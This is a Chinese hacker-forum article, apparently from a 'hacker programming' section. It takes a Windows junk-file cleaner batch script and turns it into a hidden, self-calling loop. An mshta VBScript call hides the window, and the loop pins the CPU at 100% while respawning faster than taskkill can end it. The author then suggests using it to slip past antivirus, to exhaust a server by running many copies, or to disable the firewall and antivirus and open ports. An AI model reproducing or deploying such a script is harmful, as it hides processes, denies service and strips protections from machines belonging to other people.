今天闲来无事,看到了一个垃圾清除的的BAT程序,觉得很实用便拿来看看,a.bat源代码如下:
:=============可以直接保存改名为a.bat==========
@echo offecho 正在清除系统垃圾文件,请稍等......
@@del /f /s /q %systemdrive%\*.tmp
@del /f /s /q %systemdrive%\*._mp
@del /f /s /q %systemdrive%\*.log
@del /f /s /q %systemdrive%\*.gid
@del /f /s /q %systemdrive%\*.chk
@del /f /s /q %systemdrive%\*.old
@del /f /s /q %systemdrive%\recycled\*.*
@del /f /s /q %windir%\*.bak
@del /f /s /q %windir%\prefetch\*.*
@rd /s /q %windir%\temp & md %windir%\temp
@del /f /q %userprofile%\cookies\*.*
@del /f /q %userprofile%\recent\*.*
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
@del /f /s /q "%userprofile%\recent\*.*"
echo 清除系统LJ完成!
=========================
我用了一下,效果还真不错,速度快而且不重不漏!系统这下减了不少肥哈!最后我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!其实简单的很久一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!),于是到网上找了一下,决定用VBS代码实现,于是又了下面的代码,其实也很简单,也就加了一句话进去:
=====可以直接保存改名为a.bat(一定要是a.bat哦具体说明原因你应该明白吧)===
@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
echo 正在清除系统垃圾文件,请稍等......
@@del /f /s /q %systemdrive%\*.tmp
@del /f /s /q %systemdrive%\*._mp
@del /f /s /q %systemdrive%\*.log
@del /f /s /q %systemdrive%\*.gid
@del /f /s /q %systemdrive%\*.chk
@del /f /s /q %systemdrive%\*.old
@del /f /s /q %systemdrive%\recycled\*.*
@del /f /s /q %windir%\*.bak
@del /f /s /q %windir%\prefetch\*.*
@rd /s /q %windir%\temp & md %windir%\temp
@del /f /q %userprofile%\cookies\*.*
@del /f /q %userprofile%\recent\*.*
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
@del /f /s /q "%userprofile%\recent\*.*"
echo 清除系统LJ完成!
call a.bat
=========================保存以上部======================
哈哈,运行看看!什么效果?对话框消失了!打开任务管理器查看显示CPU运用:100% 看进程里面cmd.exe占用CPU:99本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有 不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
你说,我们可以利用这个BAT做些什么:
1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?哈哈~~3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?
哈哈~当然这些应用都是我个人的一些分析,没有真正的实验过,我想应该可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方请登录华夏论坛交流!
|
安全中国首页 > 文章中心 > 黑客编程